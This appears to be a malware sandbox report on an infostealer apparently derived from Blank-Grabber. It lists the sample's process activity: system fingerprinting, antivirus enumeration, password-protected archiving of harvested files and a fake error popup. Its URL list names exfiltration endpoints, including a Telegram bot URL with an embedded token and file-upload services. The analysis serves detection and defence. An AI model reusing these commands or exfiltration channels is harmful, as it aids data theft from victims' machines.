C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip"
*"
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe
|
C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment'
-Name PROCESSOR_IDENTIFIER"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\mshta.exe
|
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ??????????
????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic csproduct get uuid
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic path win32_VideoController get name
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic path win32_VideoController get name
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\wbem\WMIC.exe
|
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp"
"c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic os get Caption
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic computersystem get totalphysicalmemory
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic csproduct get uuid
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\Conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 110 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://api.telegram.org/bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument
|
149.154.167.220
|
||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
https://github.com/Blank-c/BlankOBF
|
unknown
|
||
https://api.telegram.org/bot%s/%s
|
unknown
|
||
https://www.avito.ru/
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
|
unknown
|
||
https://github.com/Blank-c/Blank-Grabberi
|
unknown
|
||
https://www.ctrip.com/
|
unknown
|
||
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
|
unknown
|
||
https://python.org/dev/peps/pep-0263/
|
unknown
|
||
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
|
unknown
|
||
https://www.leboncoin.fr/
|
unknown
|
||
https://tools.ietf.org/html/rfc2388#section-4.4
|
unknown
|
||
https://weibo.com/
|
unknown
|
||
https://api.anonfiles.com/upload
|
unknown
|
||
https://www.msn.com
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://discord.com/api/v9/users/
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
|
unknown
|
||
https://www.reddit.com/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://www.amazon.ca/
|
unknown
|
||
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
|
unknown
|
||
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
|
unknown
|
||
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
|
unknown
|
||
https://www.ebay.co.uk/
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
https://www.ebay.de/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
|
unknown
|
||
https://www.amazon.com/
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
https://httpbin.org/
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://www.youtube.com/
|
unknown
|
||
https://allegro.pl/
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
|
unknown
|
||
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
|
unknown
|
||
https://MD8.mozilla.org/1/m
|
unknown
|
||
http://ocsp.sectigo.com0$
|
unknown
|
||
https://www.bbc.co.uk/
|
unknown
|
||
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
http://ip-api.com/line/?fields=hostingr
|
unknown
|
||
https://bugzilla.mo
|
unknown
|
||
http://tools.ietf.org/html/rfc6125#section-6.4.3
|
unknown
|
||
https://api.telegram.org/bot%s/%s)
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
http://logo.veWALLET~2.JS
|
unknown
|
||
https://google.com/mail
|
unknown
|
||
http://logo.veANIFE~1JSO
|
unknown
|
||
https://packaging.python.org/specifications/entry-points/
|
unknown
|
||
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
|
unknown
|
||
http://logo.ve
|
unknown
|
||
https://www.google.com/
|
unknown
|
||
https://www.iqiyi.com/
|
unknown
|
||
https://foss.heptapod.net/pypy/pypy/-/issues/3539
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
|
unknown
|
||
http://google.com/
|
unknown
|
||
https://api.gofile.io/getServerr
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
http://logo.veW
|
unknown
|
||
https://www.python.org/download/releases/2.3/mro/.
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://discordapp.com/api/v9/users/
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
|
unknown
|
||
http://ip-api.com/json/?fields=225545r
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
|
unknown
|
||
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2920
|
unknown
|
||
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
|
unknown
|
||
http://crl.sectigo.j$
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
|
unknown
|
||
https://yahoo.com/
|
unknown
|
||
https://account.bellmedia.c
|
unknown
|
||
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
|
unknown
|
||
https://login.microsoftonline.com
|
unknown
|
||
http://cacerts.digicert.co
|
unknown
|
||
http://crl.thawte.com/ThawteTimestampingCA.crl0
|
unknown
|
||
https://html.spec.whatwg.org/multipage/
|
unknown
|
||
https://www.ifeng.com/
|
unknown
|
||
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
|
unknown
|
||
https://www.zhihu.com/
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
https://www.rfc-editor.org/rfc/rfc8259#section-8.1
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://oneget.orgX
|
unknown
|
||
https://github.com/Unidata/MetPy/bl
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
ip-api.com
|
208.95.112.1
|
||
api.telegram.org
|
149.154.167.220
|
||
blank-a0m8c.in
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
208.95.112.1
|
ip-api.com
|
United States
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
|
1280x1024x32(BGR 0)
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\system32\mlang.dll,-4387
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\system32\mlang.dll,-4407
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1FC253C8000
|
heap
|
page read and write
|
||
1EA23124000
|
heap
|
page read and write
|
||
1FC25070000
|
direct allocation
|
page read and write
|
||
1FC22CD0000
|
heap
|
page read and write
|
||
1FC253A0000
|
heap
|
page read and write
|
||
1EA23122000
|
heap
|
page read and write
|
||
1FC25CB1000
|
heap
|
page read and write
|
||
2484A17D000
|
heap
|
page read and write
|
||
267AA9DD000
|
trusted library allocation
|
page read and write
|
||
1C55079F000
|
heap
|
page read and write
|
||
23AC5C10000
|
heap
|
page read and write
|
||
1FC25307000
|
heap
|
page read and write
|
||
6C0855F000
|
stack
|
page read and write
|
||
239FE7A3000
|
heap
|
page read and write
|
||
1FC2560E000
|
heap
|
page read and write
|
||
23195EE0000
|
heap
|
page read and write
|
||
2322B3D0000
|
heap
|
page read and write
|
||
7D446FC000
|
stack
|
page read and write
|
||
23AC5B43000
|
heap
|
page read and write
|
||
24BA3B40000
|
heap
|
page read and write
|
||
1407BA00000
|
heap
|
page read and write
|
||
1E0D6453000
|
heap
|
page read and write
|
||
1E0E1617000
|
heap
|
page read and write
|
||
23AC5B49000
|
heap
|
page read and write
|
||
29AC2260000
|
heap
|
page read and write
|
||
1FC2560E000
|
heap
|
page read and write
|
||
1DD0FA83000
|
heap
|
page read and write
|
||
23AC79EE000
|
heap
|
page read and write
|
||
1FC264D0000
|
trusted library allocation
|
page read and write
|
||
1C5507A3000
|
heap
|
page read and write
|
||
2484A169000
|
heap
|
page read and write
|
||
7FFAA96B0000
|
trusted library allocation
|
page read and write
|
||
7FFAA94A0000
|
trusted library allocation
|
page execute and read and write
|
||
1BCD1065000
|
heap
|
page read and write
|
||
267AA7B5000
|
trusted library allocation
|
page read and write
|
||
1FC2527D000
|
heap
|
page read and write
|
||
1FC25566000
|
heap
|
page read and write
|
||
1E0E2FB1000
|
heap
|
page read and write
|
||
1C550067000
|
heap
|
page read and write
|
||
1F52B8B4000
|
heap
|
page read and write
|
||
7FFAA9740000
|
trusted library allocation
|
page read and write
|
||
266F30A2000
|
heap
|
page read and write
|
||
281FE171000
|
heap
|
page read and write
|
||
7FFB0BF69000
|
unkown
|
page execute and read and write
|
||
1575D3C000
|
stack
|
page read and write
|
||
26379E50000
|
heap
|
page read and write
|
||
267B9409000
|
trusted library allocation
|
page read and write
|
||
1E0D9A80000
|
direct allocation
|
page read and write
|
||
1E0E15FA000
|
heap
|
page read and write
|
||
7FFB0BB55000
|
unkown
|
page execute and read and write
|
||
23DC3E72000
|
heap
|
page read and write
|
||
267AAF0F000
|
trusted library allocation
|
page read and write
|
||
1C55012B000
|
heap
|
page read and write
|
||
7FFB1AB18000
|
unkown
|
page read and write
|
||
1FC252EE000
|
heap
|
page read and write
|
||
8252B6F000
|
stack
|
page read and write
|
||
1CEF207B000
|
heap
|
page read and write
|
||
2422BD35000
|
heap
|
page read and write
|
||
1FC256B8000
|
heap
|
page read and write
|
||
22973190000
|
heap
|
page read and write
|
||
1E8E34F5000
|
trusted library allocation
|
page read and write
|
||
1E8E4052000
|
heap
|
page read and write
|
||
2484A7F9000
|
heap
|
page read and write
|
||
2484A107000
|
heap
|
page read and write
|
||
1FC25558000
|
heap
|
page read and write
|
||
1FC24F48000
|
heap
|
page read and write
|
||
22972EAD000
|
heap
|
page read and write
|
||
13C876A1000
|
heap
|
page read and write
|
||
1700B89B000
|
heap
|
page read and write
|
||
7FF74EE71000
|
unkown
|
page execute read
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
1FC25C60000
|
direct allocation
|
page read and write
|
||
281FC357000
|
heap
|
page read and write
|
||
270D27B2000
|
heap
|
page read and write
|
||
1A2CE4E4000
|
heap
|
page read and write
|
||
1A2CE3D0000
|
heap
|
page read and write
|
||
2484A7E7000
|
heap
|
page read and write
|
||
6C085DF000
|
stack
|
page read and write
|
||
1FC25CB0000
|
heap
|
page read and write
|
||
1DD0C7AD000
|
heap
|
page read and write
|
||
270D222F000
|
heap
|
page read and write
|
||
1FC256AA000
|
heap
|
page read and write
|
||
C68552C000
|
stack
|
page read and write
|
||
1FC25635000
|
heap
|
page read and write
|
||
1C550127000
|
heap
|
page read and write
|
||
22973194000
|
heap
|
page read and write
|
||
1690FA04000
|
heap
|
page read and write
|
||
281FC150000
|
heap
|
page read and write
|
||
15776FE000
|
unkown
|
page readonly
|
||
23AC6132000
|
heap
|
page read and write
|
||
D7419FF000
|
stack
|
page read and write
|
||
1E0E15F7000
|
heap
|
page read and write
|
||
1E5FA77A000
|
heap
|
page read and write
|
||
7FFAA93AC000
|
trusted library allocation
|
page execute and read and write
|
||
1E0D64B7000
|
heap
|
page read and write
|
||
267B9419000
|
trusted library allocation
|
page read and write
|
||
1E8E3FEC000
|
heap
|
page read and write
|
||
20D43AFC000
|
heap
|
page read and write
|
||
281FE177000
|
heap
|
page read and write
|
||
1FC26164000
|
heap
|
page read and write
|
||
2484A160000
|
heap
|
page read and write
|
||
1FC25675000
|
heap
|
page read and write
|
||
1CEF2085000
|
heap
|
page read and write
|
||
1407CA80000
|
trusted library allocation
|
page read and write
|
||
1E0E15B6000
|
heap
|
page read and write
|
||
26A1C54B000
|
heap
|
page read and write
|
||
24BA3C94000
|
heap
|
page read and write
|
||
23AC60FB000
|
heap
|
page read and write
|
||
76BC4C7000
|
stack
|
page read and write
|
||
1407C140000
|
trusted library section
|
page readonly
|
||
1FC255F3000
|
heap
|
page read and write
|
||
1E0E1592000
|
heap
|
page read and write
|
||
CC931FF000
|
stack
|
page read and write
|
||
1CEF2598000
|
heap
|
page read and write
|
||
6089C8B000
|
stack
|
page read and write
|
||
7FFAA9700000
|
trusted library allocation
|
page read and write
|
||
1FC256A9000
|
heap
|
page read and write
|
||
1E0D99C0000
|
direct allocation
|
page read and write
|
||
23AC79F6000
|
heap
|
page read and write
|
||
1FC25614000
|
heap
|
page read and write
|
||
202E5860000
|
heap
|
page read and write
|
||
19DD4F11000
|
heap
|
page read and write
|
||
266F3150000
|
trusted library allocation
|
page read and write
|
||
1FC255A7000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
1CEF3F7F000
|
heap
|
page read and write
|
||
1FC25F8A000
|
heap
|
page read and write
|
||
1FC25330000
|
heap
|
page read and write
|
||
81D267F000
|
stack
|
page read and write
|
||
1407C730000
|
trusted library allocation
|
page read and write
|
||
135F05F9000
|
heap
|
page read and write
|
||
7FFAA96C2000
|
trusted library allocation
|
page read and write
|
||
23AC5B41000
|
heap
|
page read and write
|
||
1FC22D70000
|
heap
|
page read and write
|
||
23AC5B4F000
|
heap
|
page read and write
|
||
7FFAA9600000
|
trusted library allocation
|
page read and write
|
||
1CEF2058000
|
heap
|
page read and write
|
||
1FC255D6000
|
heap
|
page read and write
|
||
239E8054000
|
trusted library allocation
|
page read and write
|
||
1AD18B19000
|
heap
|
page read and write
|
||
1E0D6476000
|
heap
|
page read and write
|
||
9A8647F000
|
stack
|
page read and write
|
||
1909D570000
|
heap
|
page read and write
|
||
1E0E15D6000
|
heap
|
page read and write
|
||
23195EC0000
|
heap
|
page read and write
|
||
1DD0FA14000
|
heap
|
page read and write
|
||
7FFB0D721000
|
unkown
|
page execute read
|
||
24B86961000
|
heap
|
page read and write
|
||
7FFAA97B0000
|
trusted library allocation
|
page read and write
|
||
24BA3C90000
|
heap
|
page read and write
|
||
65B07FF000
|
unkown
|
page read and write
|
||
1E8E3FD4000
|
heap
|
page read and write
|
||
2BA38AD0000
|
heap
|
page read and write
|
||
27EA9BB0000
|
heap
|
page read and write
|
||
7FFB0B889000
|
unkown
|
page execute and read and write
|
||
1407B2A0000
|
heap
|
page read and write
|
||
1E0D9BA9000
|
direct allocation
|
page read and write
|
||
1FC255A2000
|
heap
|
page read and write
|
||
7D448FF000
|
stack
|
page read and write
|
||
1FC22E60000
|
heap
|
page read and write
|
||
270D4041000
|
heap
|
page read and write
|
||
1CEF258C000
|
heap
|
page read and write
|
||
825259F000
|
stack
|
page read and write
|
||
135F0804000
|
heap
|
page read and write
|
||
1FC25D27000
|
heap
|
page read and write
|
||
20D43ADB000
|
heap
|
page read and write
|
||
1E8E41E0000
|
heap
|
page read and write
|
||
1FC255C1000
|
heap
|
page read and write
|
||
21B1BE80000
|
heap
|
page read and write
|
||
1FC25652000
|
heap
|
page read and write
|
||
267C16CA000
|
heap
|
page read and write
|
||
266F4F5F000
|
heap
|
page read and write
|
||
281FC33F000
|
heap
|
page read and write
|
||
1E0D9B00000
|
direct allocation
|
page read and write
|
||
51D413F000
|
stack
|
page read and write
|
||
270D2224000
|
heap
|
page read and write
|
||
1FC25622000
|
heap
|
page read and write
|
||
1E0D64B7000
|
heap
|
page read and write
|
||
1C55028B000
|
heap
|
page read and write
|
||
2422BD00000
|
heap
|
page read and write
|
||
1576AFB000
|
stack
|
page read and write
|
||
7FFB0C291000
|
unkown
|
page execute read
|
||
266F3098000
|
heap
|
page read and write
|
||
16533734000
|
heap
|
page read and write
|
||
1E0D9980000
|
direct allocation
|
page read and write
|
||
1FC2553F000
|
heap
|
page read and write
|
||
1FC25BBF000
|
heap
|
page read and write
|
||
23195FBB000
|
heap
|
page read and write
|
||
1CEF268A000
|
heap
|
page read and write
|
||
2484A118000
|
heap
|
page read and write
|
||
20D43AFC000
|
heap
|
page read and write
|
||
1407B25B000
|
heap
|
page read and write
|
||
1E0E1596000
|
heap
|
page read and write
|
||
1E8E34F9000
|
trusted library allocation
|
page read and write
|
||
2484A157000
|
heap
|
page read and write
|
||
266F36A7000
|
heap
|
page read and write
|
||
1FC26124000
|
heap
|
page read and write
|
||
7FFB0C441000
|
unkown
|
page execute and read and write
|
||
1E0E15F1000
|
heap
|
page read and write
|
||
D8D52FC000
|
stack
|
page read and write
|
||
267AA2A5000
|
trusted library allocation
|
page read and write
|
||
1407C770000
|
trusted library allocation
|
page read and write
|
||
1E8E34F3000
|
trusted library allocation
|
page read and write
|
||
1FC22D3E000
|
heap
|
page read and write
|
||
1FC255F7000
|
heap
|
page read and write
|
||
1E0D9960000
|
direct allocation
|
page read and write
|
||
1F52B830000
|
heap
|
page read and write
|
||
266F30A2000
|
heap
|
page read and write
|
||
1E0E15FA000
|
heap
|
page read and write
|
||
7FFB0C291000
|
unkown
|
page execute read
|
||
544A6FE000
|
stack
|
page read and write
|
||
D8D54FF000
|
stack
|
page read and write
|
||
1CEF258C000
|
heap
|
page read and write
|
||
7FFB0BFE1000
|
unkown
|
page execute and read and write
|
||
281FC270000
|
trusted library allocation
|
page read and write
|
||
1FC2536E000
|
heap
|
page read and write
|
||
27EA9A82000
|
heap
|
page read and write
|
||
2484A457000
|
heap
|
page read and write
|
||
1E8E4640000
|
heap
|
page read and write
|
||
CC930FF000
|
unkown
|
page read and write
|
||
266F4F65000
|
heap
|
page read and write
|
||
266F36D9000
|
heap
|
page read and write
|
||
7FFB0BB68000
|
unkown
|
page read and write
|
||
81CDFFF000
|
stack
|
page read and write
|
||
2BA38B00000
|
heap
|
page read and write
|
||
266F36A0000
|
heap
|
page read and write
|
||
7FFB1E4CA000
|
unkown
|
page execute and write copy
|
||
1CE587D1000
|
heap
|
page read and write
|
||
4B74FFF000
|
stack
|
page read and write
|
||
26395B20000
|
heap
|
page read and write
|
||
7DF448C90000
|
trusted library allocation
|
page execute and read and write
|
||
1CEF2685000
|
heap
|
page read and write
|
||
1FC255D6000
|
heap
|
page read and write
|
||
27EA9A60000
|
heap
|
page read and write
|
||
239FEC40000
|
trusted library section
|
page read and write
|
||
24BA3992000
|
heap
|
page read and write
|
||
1FC252EE000
|
heap
|
page read and write
|
||
51D46F9000
|
stack
|
page read and write
|
||
1FC255A3000
|
heap
|
page read and write
|
||
1FC24F48000
|
heap
|
page read and write
|
||
7FFAA9570000
|
trusted library allocation
|
page read and write
|
||
267A78B0000
|
heap
|
page read and write
|
||
1DD0FA82000
|
heap
|
page read and write
|
||
1FC255C1000
|
heap
|
page read and write
|
||
1CEF2097000
|
heap
|
page read and write
|
||
1E0D9A20000
|
direct allocation
|
page read and write
|
||
1DD103F6000
|
heap
|
page read and write
|
||
7FFAA96F0000
|
trusted library allocation
|
page read and write
|
||
1C550127000
|
heap
|
page read and write
|
||
270D27C9000
|
heap
|
page read and write
|
||
27EA9A6B000
|
heap
|
page read and write
|
||
1FC252A7000
|
heap
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
270D27C9000
|
heap
|
page read and write
|
||
1FC22D6C000
|
heap
|
page read and write
|
||
7FFAA9660000
|
trusted library allocation
|
page read and write
|
||
7FFB1AB16000
|
unkown
|
page execute and write copy
|
||
29AC2490000
|
heap
|
page read and write
|
||
1FC25523000
|
heap
|
page read and write
|
||
1FC24EDE000
|
heap
|
page read and write
|
||
1FC255D2000
|
heap
|
page read and write
|
||
23097D32000
|
heap
|
page read and write
|
||
281FE17E000
|
heap
|
page read and write
|
||
7FFB0C5E9000
|
unkown
|
page execute and write copy
|
||
266F3074000
|
heap
|
page read and write
|
||
267A779B000
|
heap
|
page read and write
|
||
81D232B000
|
stack
|
page read and write
|
||
1FC26160000
|
heap
|
page read and write
|
||
7FFB0C2B2000
|
unkown
|
page readonly
|
||
76BB778000
|
stack
|
page read and write
|
||
1E8E34F6000
|
trusted library allocation
|
page read and write
|
||
7FFB0C2B5000
|
unkown
|
page readonly
|
||
1C550799000
|
heap
|
page read and write
|
||
281FE17E000
|
heap
|
page read and write
|
||
2364087F000
|
heap
|
page read and write
|
||
1E8E3FF2000
|
heap
|
page read and write
|
||
1AD18C10000
|
heap
|
page read and write
|
||
1FC25560000
|
heap
|
page read and write
|
||
1C550129000
|
heap
|
page read and write
|
||
1FC2526D000
|
heap
|
page read and write
|
||
26395B50000
|
heap
|
page read and write
|
||
2584DAE0000
|
heap
|
page read and write
|
||
1FC253B7000
|
heap
|
page read and write
|
||
6089D8F000
|
stack
|
page read and write
|
||
16533605000
|
heap
|
page read and write
|
||
23097D42000
|
heap
|
page read and write
|
||
1E8E41E0000
|
heap
|
page read and write
|
||
23195FD2000
|
heap
|
page read and write
|
||
7FFB0C2A6000
|
unkown
|
page readonly
|
||
2484A45A000
|
heap
|
page read and write
|
||
270D2183000
|
heap
|
page read and write
|
||
7FFB0BA5E000
|
unkown
|
page execute and read and write
|
||
1CEF2058000
|
heap
|
page read and write
|
||
7FFAA9680000
|
trusted library allocation
|
page read and write
|
||
1E8E41D8000
|
heap
|
page read and write
|
||
1C550096000
|
heap
|
page read and write
|
||
27EA9A6D000
|
heap
|
page read and write
|
||
23097EF0000
|
heap
|
page read and write
|
||
